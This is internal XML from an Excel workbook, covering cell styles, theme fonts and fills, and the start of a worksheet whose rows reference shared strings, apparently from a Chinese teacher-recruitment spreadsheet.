    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="45">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="9" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="9" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="11" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="11" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="11" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="12" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="12" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="12" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="13" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="13" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="13" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="11" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="12" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="13" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="12" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="13" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="10" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="68" applyNumberFormat="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <alignment horizontal="general" vertical="center" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf numFmtId="49" fontId="34" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="0">
      <alignment horizontal="general" vertical="bottom" shrinkToFit="0" wrapText="0"/>
    </xf>
  </cellXfs>
  <cellStyles count="54">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="Comma" xfId="15" builtinId="3"/>
    <cellStyle name="Currency" xfId="16" builtinId="4"/>
    <cellStyle name="Percent" xfId="17" builtinId="5"/>
    <cellStyle name="Comma [0]" xfId="18" builtinId="6"/>
    <cellStyle name="Currency[0]" xfId="19" builtinId="7"/>
    <cellStyle name="Hyperlink" xfId="20" builtinId="8"/>
    <cellStyle name="Followed Hyperlink" xfId="21" builtinId="9"/>
    <cellStyle name="注释" xfId="22" builtinId="10"/>
    <cellStyle name="警告文本" xfId="23" builtinId="11"/>
    <cellStyle name="标题" xfId="24" builtinId="15"/>
    <cellStyle name="解释性文本" xfId="25" builtinId="53"/>
    <cellStyle name="标题 1" xfId="26" builtinId="16"/>
    <cellStyle name="标题 2" xfId="27" builtinId="17"/>
    <cellStyle name="标题 3" xfId="28" builtinId="18"/>
    <cellStyle name="标题 4" xfId="29" builtinId="19"/>
    <cellStyle name="输入" xfId="30" builtinId="20"/>
    <cellStyle name="输出" xfId="31" builtinId="21"/>
    <cellStyle name="计算" xfId="32" builtinId="22"/>
    <cellStyle name="检查单元格" xfId="33" builtinId="23"/>
    <cellStyle name="链接单元格" xfId="34" builtinId="24"/>
    <cellStyle name="汇总" xfId="35" builtinId="25"/>
    <cellStyle name="好" xfId="36" builtinId="26"/>
    <cellStyle name="差" xfId="37" builtinId="27"/>
    <cellStyle name="适中" xfId="38" builtinId="28"/>
    <cellStyle name="强调文字颜色 1" xfId="39" builtinId="29"/>
    <cellStyle name="20% - 强调文字颜色 1" xfId="40" builtinId="30"/>
    <cellStyle name="40% - 强调文字颜色 1" xfId="41" builtinId="31"/>
    <cellStyle name="60% - 强调文字颜色 1" xfId="42" builtinId="32"/>
    <cellStyle name="强调文字颜色 2" xfId="43" builtinId="33"/>
    <cellStyle name="20% - 强调文字颜色 2" xfId="44" builtinId="34"/>
    <cellStyle name="40% - 强调文字颜色 2" xfId="45" builtinId="35"/>
    <cellStyle name="60% - 强调文字颜色 2" xfId="46" builtinId="36"/>
    <cellStyle name="强调文字颜色 3" xfId="47" builtinId="37"/>
    <cellStyle name="20% - 强调文字颜色 3" xfId="48" builtinId="38"/>
    <cellStyle name="40% - 强调文字颜色 3" xfId="49" builtinId="39"/>
    <cellStyle name="60% - 强调文字颜色 3" xfId="50" builtinId="40"/>
    <cellStyle name="强调文字颜色 4" xfId="51" builtinId="41"/>
    <cellStyle name="20% - 强调文字颜色 4" xfId="52" builtinId="42"/>
    <cellStyle name="40% - 强调文字颜色 4" xfId="53" builtinId="43"/>
    <cellStyle name="60% - 强调文字颜色 4" xfId="54" builtinId="44"/>
    <cellStyle name="强调文字颜色 5" xfId="55" builtinId="45"/>
    <cellStyle name="20% - 强调文字颜色 5" xfId="56" builtinId="46"/>
    <cellStyle name="40% - 强调文字颜色 5" xfId="57" builtinId="47"/>
    <cellStyle name="60% - 强调文字颜色 5" xfId="58" builtinId="48"/>
    <cellStyle name="强调文字颜色 6" xfId="59" builtinId="49"/>
    <cellStyle name="20% - 强调文字颜色 6" xfId="60" builtinId="50"/>
    <cellStyle name="40% - 强调文字颜色 6" xfId="61" builtinId="51"/>
    <cellStyle name="60% - 强调文字颜色 6" xfId="62" builtinId="52"/>
    <cellStyle name="常规 2_大石桥市2016年“特岗计划”教师招聘计划表（专业新改）" xfId="63"/>
    <cellStyle name="常规 3" xfId="64"/>
    <cellStyle name="常规 4" xfId="65"/>
    <cellStyle name="常规 5" xfId="66"/>
    <cellStyle name="样式 1" xfId="67"/>
  </cellStyles>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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet2.xml" /><Relationship Id="rId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.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
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Viet" typeface="Times New Roman"/>
        <a:font script="Geor" typeface="Sylfaen"/>
        <a:font script="Sinh" typeface="Iskoola Pota"/>
        <a:font script="Laoo" typeface="DokChampa"/>
        <a:font script="Orya" typeface="Kalinga"/>
        <a:font script="Mong" typeface="Mongolian Baiti"/>
        <a:font script="Mlym" typeface="Kartika"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Telu" typeface="Gautami"/>
        <a:font script="Deva" typeface="Mangal"/>
        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
        <a:font script="Cans" typeface="Euphemia"/>
        <a:font script="Khmr" typeface="MoolBoran"/>
        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
        <a:font script="Thai" typeface="Tahoma"/>
        <a:font script="Gujr" typeface="Shruti"/>
        <a:font script="Uigh" typeface="Microsoft Uighur"/>
        <a:font script="Beng" typeface="Vrinda"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Thaa" typeface="MV Boli"/>
        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
        <a:font script="Hebr" typeface="Times New Roman"/>
        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
        <a:font script="Guru" typeface="Raavi"/>
        <a:font script="Hans" typeface="宋体"/>
        <a:font script="Ethi" typeface="Nyala"/>
        <a:font script="Taml" typeface="Latha"/>
        <a:font script="Knda" typeface="Tunga"/>
        <a:font script="Arab" typeface="Times New Roman"/>
        <a:font script="Hant" typeface="新細明體"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri" panose=""/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Viet" typeface="Arial"/>
        <a:font script="Geor" typeface="Sylfaen"/>
        <a:font script="Sinh" typeface="Iskoola Pota"/>
        <a:font script="Laoo" typeface="DokChampa"/>
        <a:font script="Orya" typeface="Kalinga"/>
        <a:font script="Mong" typeface="Mongolian Baiti"/>
        <a:font script="Mlym" typeface="Kartika"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Telu" typeface="Gautami"/>
        <a:font script="Deva" typeface="Mangal"/>
        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
        <a:font script="Cans" typeface="Euphemia"/>
        <a:font script="Khmr" typeface="DaunPenh"/>
        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
        <a:font script="Thai" typeface="Tahoma"/>
        <a:font script="Gujr" typeface="Shruti"/>
        <a:font script="Uigh" typeface="Microsoft Uighur"/>
        <a:font script="Beng" typeface="Vrinda"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Thaa" typeface="MV Boli"/>
        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
        <a:font script="Hebr" typeface="Arial"/>
        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
        <a:font script="Guru" typeface="Raavi"/>
        <a:font script="Hans" typeface="宋体"/>
        <a:font script="Ethi" typeface="Nyala"/>
        <a:font script="Taml" typeface="Latha"/>
        <a:font script="Knda" typeface="Tunga"/>
        <a:font script="Arab" typeface="Arial"/>
        <a:font script="Hant" typeface="新細明體"/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="Office 2007-2010">
      <a:fillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:satMod val="300000"/>
                <a:tint val="50000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="35000">
              <a:schemeClr val="phClr">
                <a:satMod val="300000"/>
                <a:tint val="37000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:satMod val="350000"/>
                <a:tint val="15000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="1"/>
        </a:gradFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:satMod val="130000"/>
                <a:shade val="51000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="80000">
              <a:schemeClr val="phClr">
                <a:satMod val="130000"/>
                <a:shade val="93000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:satMod val="135000"/>
                <a:shade val="94000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="0"/>
        </a:gradFill>
      </a:fillStyleLst>
      <a:lnStyleLst>
        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr">
              <a:satMod val="105000"/>
              <a:shade val="9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a:blurRad="40000" a:dist="20000" a:dir="5400000" a:rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="38000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw a:blurRad="40000" a:dist="23000" a:dir="5400000" a:rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw a:blurRad="40000" a:dist="23000" a:dir="5400000" a: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satMod val="350000"/>
                <a:tint val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="40000">
              <a:schemeClr val="phClr">
                <a:satMod val="350000"/>
                <a:shade val="99000"/>
                <a:tint val="45000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:satMod val="255000"/>
                <a:shade val="20000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
          </a:path>
        </a:gradFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:satMod val="300000"/>
                <a:tint val="80000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:satMod val="200000"/>
                <a:shade val="3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mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
  <sheetPr/>
  <dimension ref="B1:C142"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="B1" workbookViewId="0">
      <selection activeCell="F1" sqref="A1:F16384"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" customHeight="1" baseColWidth="8" defaultColWidth="9"/>
  <cols>
    <col width="19.25" customWidth="1" min="1" max="1" hidden="1"/>
    <col width="6.625" customWidth="1" min="2" max="2" style="42"/>
    <col width="31.875" customWidth="1" min="3" max="3" style="43" hidden="1"/>
    <col width="9" customWidth="1" min="4" max="6" hidden="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:3" ht="14.25">
      <c r="B1" s="42" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="43" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="2:3" ht="14.25">
      <c r="B2" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C2" s="43" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" spans="2:3" ht="15.75">
      <c r="B3" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="44" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="2:3" ht="14.25">
      <c r="B4" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C4" s="43" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="2:3" ht="14.25">
      <c r="B5" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C5" s="43" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="2:3" ht="14.25">
      <c r="B6" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C6" s="43" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="2:3" ht="14.25">
      <c r="B7" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C7" s="43" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="2:3" ht="14.25">
      <c r="B8" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C8" s="43" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="9" spans="2:3" ht="14.25">
      <c r="B9" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C9" s="43" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C10" s="44" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C11" s="44" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" s="42" t="s">
        <v>2</v>
      </c>
      <c r="C12" s="44" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" spans="2:3" ht="14.25">
      <c r="B13" s="42" t="s">
        <v>14</v>
      </c>
      <c r="C13" s="43" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" s="42" t="s">
        <v>16</v>
      </c>
      <c r="C14" s="44" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" s="42" t="s">
        <v>17</v>
      </c>
      <c r="C15" s="44" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" s="42" t="s">
        <v>19</v>
      </c>
      <c r="C16" s="44" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" s="42" t="s">
        <v>20</v>
      </c>
      <c r="C17" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" s="42" t="s">
        <v>22</v>
      </c>
      <c r="C18" s="44" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" s="42" t="s">
        <v>24</v>
      </c>
      <c r="C19" s="44" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" s="42" t="s">
        <v>25</v>
      </c>
      <c r="C20" s="44" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" spans="2:3" ht="14.25">
      <c r="B21" s="42" t="s">
        <v>26</v>
      </c>
      <c r="C21" s="43" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" spans="2:3" ht="14.25">
      <c r="B22" s="42" t="s">
        <v>28</v>
      </c>
      <c r="C22" s="43" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" s="42" t="s">
        <v>30</v>
      </c>
      <c r="C23" s="44" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" s="42" t="s">
        <v>32</v>
      </c>
      <c r="C24" s="44" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="25" spans="2:3" ht="14.25">
      <c r="B25" s="42" t="s">
        <v>34</v>
      </c>
      <c r="C25" s="43" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" s="42" t="s">
        <v>36</v>
      </c>
      <c r="C26" s="44" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" s="42" t="s">
        <v>38</v>
      </c>
      <c r="C27" s="44" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" s="42" t="s">
        <v>40</v>
      </c>
      <c r="C28" s="44" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" s="42" t="s">
        <v>42</v>
      </c>
      <c r="C29" s="44" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" s="42" t="s">
        <v>44</v>
      </c>
      <c r="C30" s="44" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" s="42" t="s">
        <v>46</v>
      </c>
      <c r="C31" s="44" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" s="42" t="s">
        <v>48</v>
      </c>
      <c r="C32" s="44" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" s="42" t="s">
        <v>50</v>
      </c>
      <c r="C33" s="44" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" s="42" t="s">
        <v>52</v>
      </c>
      <c r="C34" s="44" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="35" spans="2:3" ht="14.25">
      <c r="B35" s="42" t="s">
        <v>54</v>
      </c>
      <c r="C35" s="43" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" s="42" t="s">
        <v>55</v>
      </c>
      <c r="C36" s="44" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="37" spans="2:3" ht="14.25">
      <c r="B37" s="42" t="s">
        <v>57</v>
      </c>
      <c r="C37" s="43" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" spans="2:3" ht="14.25">
